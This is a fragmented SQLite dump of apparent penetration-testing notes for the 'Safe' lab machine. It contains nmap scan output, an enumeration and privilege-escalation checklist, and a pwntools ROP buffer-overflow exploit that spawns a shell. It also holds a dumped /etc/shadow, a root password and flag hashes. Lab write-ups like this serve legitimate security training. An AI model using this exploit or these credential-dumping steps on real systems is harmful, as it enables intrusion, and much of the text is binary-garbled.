SQLite format 3@ -  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"Aq Ĝk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*Aq Mhk!' 10.10.10.Xcustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colov)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&j%}'  Web Services 'myapp' can be downloaded to analyze from here its running on port 1337 LOOK AT THE DEFAULT PAGE SOURCE CODEcustom-colors"Ay;tk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXW#Y'  Enumerationnmap -sC -sV -p- -Pn -oA ./Safe 10.10 n$Lk '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2l'   Othercustom-colorsA[EϯA[Tci '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DNn )'  Other Servicescustom-colorsXA[Ad Fhh[v)'  [/U'  Post ExploitationJPGs and a KeePass database - The image is the keyfile for the database. The root password is in the kbdxcustom-colors*AàB\%'  ExploitationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Service Exploited: ROP - BOF Vulnerability Type: Exploit POC: Description: Process Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories custom-colorsXAIZ|xAqKǃZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4* OO\O G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁p)'   Users & GroupsUsers Groupscustom-colors$A[k׀.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg s^sPg'  GoodiesService Exploited: KeePass Image Key Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability keepass2john > kdbx file > Root Password Stored Exploit Code Used Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAàS )c'  Scheduled JobsScheduled Taskscustom-colors$ANl $p$Q3'  PasswordsKeePass Image password = bullshit root : u3v2249dl9ptv465cogl3cnpo3fyhk custom-colors$Aà, J%#i' g'  Goodiescustom-colorsVA?& cA/!'  Proof\Flags\Other user -7a29ee9b0fa17ac013d4bf01fd127690 root - d7af235eb1db9fa059d2b99a6d1d5453custom-colors$Aàς /9'  Software VersionsSoftware Versions Potential Exploitscustom-colorsANlH{xK/'  Proof\Flags\Other<?'   Hashesuser@safe:~$ su Password: root@safe:/home/user# cat /etc/shadow root:$6$iE0ich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ.,  (#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree custom-colorsAq`1'h  ' Log Bookcustom-colors(AI^ 55/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3QqRbqX$SO70xxyVXLPb5eQCAjbP.oYY3UJAU0Aufp3cMciPitSSFin4Y6wwFdM.89bqBThXmPODqYDl6PqtoSd2zA1PU1:18029:0:99999:7::: daemon:*:18029:0:99999:7::: bin:*:18029:0:99999:7::: sys:*:18029:0:99999:7::: sync:*:18029:0:99999:7::: games:*:18029:0:99999:7::: man:*:18029:0:99999:7::: lp:*:18029:0:99999:7::: mail:*:18029:0:99999:7::: news:*:18029:0:99999:7::: uucp:*:18029:0:99999:7::: proxy:*:18029:0:99999:7::: www-data:*:18029:0:99999:7::: backup:*:18029:0:99999:7::: list:*:18029:0:99999:7::: irc:*:18029:0:99999:7::: gnats:*:18029:0:99999:7::: nobody:*:18029:0:99999:7::: systemd-timesync:*:18029:0:99999:7::: systemd-network:*:18029:0:99999:7::: systemd-resolve:*:18029:0:99999:7::: systemd-bus-proxy:*:18029:0:99999:7::: _apt:*:18029:0:99999:7::: avahi-autoipd:*:18029:0:99999:7::: messagebus:*:18029:0:99999:7::: sshd:*:18029:0:99999:7::: user:$6$lON8PIup$XFVsRsQROfiALM72m1.4wlGtb3FXmqUYAYAPUw2cSbzQdLosKqSER094hOJAoU02W.OMNcV.gaQ4QEU1d0FhY1:18029:0:99999:7::: root@safe:/home/user# custom-colors$Aà\).10.147 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-14 12:31 EDT Nmap scan report for 10.10.10.147 Host is up (0.024s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 6d:7c:81:3d:6a:3d:f9:5f:2e:1f:6a:97:e5:00:ba:de (RSA) | 256 99:7e:1e:22:76:72:da:3c:c9:61:7d:74:d7:80:33:d2 (ECDSA) |_ 256 6a:6b:c3:8e:4b:28:f7:60:85:b1:62:ff:54:bc:d8:d6 (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Apache2 Debian Default Page: It works 1337/tcp open waste? | fingerprint-strings: | DNSStatusRequestTCP: | 12:33:59 up 0 min, 0 users, load average: 0.24, 0.08, 0.03 | DNSVersionBindReqTCP: | 12:33:54 up 0 min, 0 users, load average: 0.26, 0.09, 0.03 | GenericLines: | 12:33:42 up 0 min, 0 users, load average: 0.34, 0.09, 0.03 | What do you want me to echo back? | GetRequest: | 12:33:48 up 0 min, 0 users, load average: 0.28, 0.09, 0.03 | What do you want me to echo back? GET / HTTP/1.0 | HTTPOptions: | 12:33:49 up 0 min, 0 users, load average: 0.28, 0.09, 0.03 | What do you want me to echo back? OPTIONS / HTTP/1.0 | Help: | 12:34:04 up 1 min, 0 users, load average: 0.22, 0.08, 0.03 | What do you want me to echo back? HELP | NULL: | 12:33:42 up 0 min, 0 users, load average: 0.34, 0.09, 0.03 | RPCCheck: | 12:33:49 up 0 min, 0 users, load average: 0.28, 0.09, 0.03 | RTSPRequest: | 12:33:49 up 0 min, 0 users, load average: 0.28, 0.09, 0.03 | What do you want me to echo back? OPTIONS / RTSP/1.0 | SSLSessionReq, TLSSessionReq, TerminalServerCookie: | 12:34:04 up 1 min, 0 users, load average: 0.22, 0.08, 0.03 |_ What do you want me to echo back? 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port1337-TCP:V=7.80%I=7%D=7/14%Time=5F0DDDDE%P=x86_64-pc-linux-gnu%r(NU SF:LL,3E,"\x2012:33:42\x20up\x200\x20min,\x20\x200\x20users,\x20\x20load\x SF:20average:\x200\.34,\x200\.09,\x200\.03\n")%r(GenericLines,63,"\x2012:3 SF:3:42\x20up\x200\x20min,\x20\x200\x20users,\x20\x20load\x20average:\x200 SF:\.34,\x200\.09,\x200\.03\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20ec SF:ho\x20back\?\x20\r\n")%r(GetRequest,71,"\x2012:33:48\x20up\x200\x20min, SF:\x20\x200\x20users,\x20\x20load\x20average:\x200\.28,\x200\.09,\x200\.0 SF:3\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20GET\x20 SF:/\x20HTTP/1\.0\r\n")%r(HTTPOptions,75,"\x2012:33:49\x20up\x200\x20min,\ SF:x20\x200\x20users,\x20\x20load\x20average:\x200\.28,\x200\.09,\x200\.03 SF:\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20OPTIONS\ SF:x20/\x20HTTP/1\.0\r\n")%r(RTSPRequest,75,"\x2012:33:49\x20up\x200\x20mi SF:n,\x20\x200\x20users,\x20\x20load\x20average:\x200\.28,\x200\.09,\x200\ SF:.03\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20OPTIO SF:NS\x20/\x20RTSP/1\.0\r\n")%r(RPCCheck,3E,"\x2012:33:49\x20up\x200\x20mi SF:n,\x20\x200\x20users,\x20\x20load\x20average:\x200\.28,\x200\.09,\x200\ SF:.03\n")%r(DNSVersionBindReqTCP,3E,"\x2012:33:54\x20up\x200\x20min,\x20\ SF:x200\x20users,\x20\x20load\x20average:\x200\.26,\x200\.09,\x200\.03\n") SF:%r(DNSStatusRequestTCP,3E,"\x2012:33:59\x20up\x200\x20min,\x20\x200\x20 SF:users,\x20\x20load\x20average:\x200\.24,\x200\.08,\x200\.03\n")%r(Help, SF:67,"\x2012:34:04\x20up\x201\x20min,\x20\x200\x20users,\x20\x20load\x20a SF:verage:\x200\.22,\x200\.08,\x200\.03\n\nWhat\x20do\x20you\x20want\x20me SF:\x20to\x20echo\x20back\?\x20HELP\r\n")%r(SSLSessionReq,64,"\x2012:34:04 SF:\x20up\x201\x20min,\x20\x200\x20users,\x20\x20load\x20average:\x200\.22 SF:,\x200\.08,\x200\.03\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x SF:20back\?\x20\x16\x03\n")%r(TerminalServerCookie,63,"\x2012:34:04\x20up\ SF:x201\x20min,\x20\x200\x20users,\x20\x20load\x20average:\x200\.22,\x200\ SF:.08,\x200\.03\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\ SF:?\x20\x03\n")%r(TLSSessionReq,64,"\x2012:34:04\x20up\x201\x20min,\x20\x SF:200\x20users,\x20\x20load\x20average:\x200\.22,\x200\.08,\x200\.03\n\nW SF:hat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20\x16\x03\n"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 105.18 secondscustom-colors*Ay:=qe" weight="heavy">Discovery of Vulnerability http://10.10.10.147/myapp Exploit Code Used from pwn import * target = remote("10.10.10.147" , 1337) buf = "A" * 120 ''' 0x0000000000401206: pop r13; pop r14; pop r15; ret; ''' pop_r13_garbage = p64(0x401206) ''' 0x000000000040116e <+15>: call 0x401040 <system@plt> ''' system = p64(0x40116e) binsh = "/bin/sh\x00" ''' 0x0000000000401156 <+4>: mov rdi,rsp 0x0000000000401159 <+7>: jmp r13 ''' test = p64(0x401156) chain = buf + pop_r13_garbage + system + "BBBBBBBB" + "CCCCCCCC" + test + binsh target.sendline(chain) target.interactive() Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,A{*n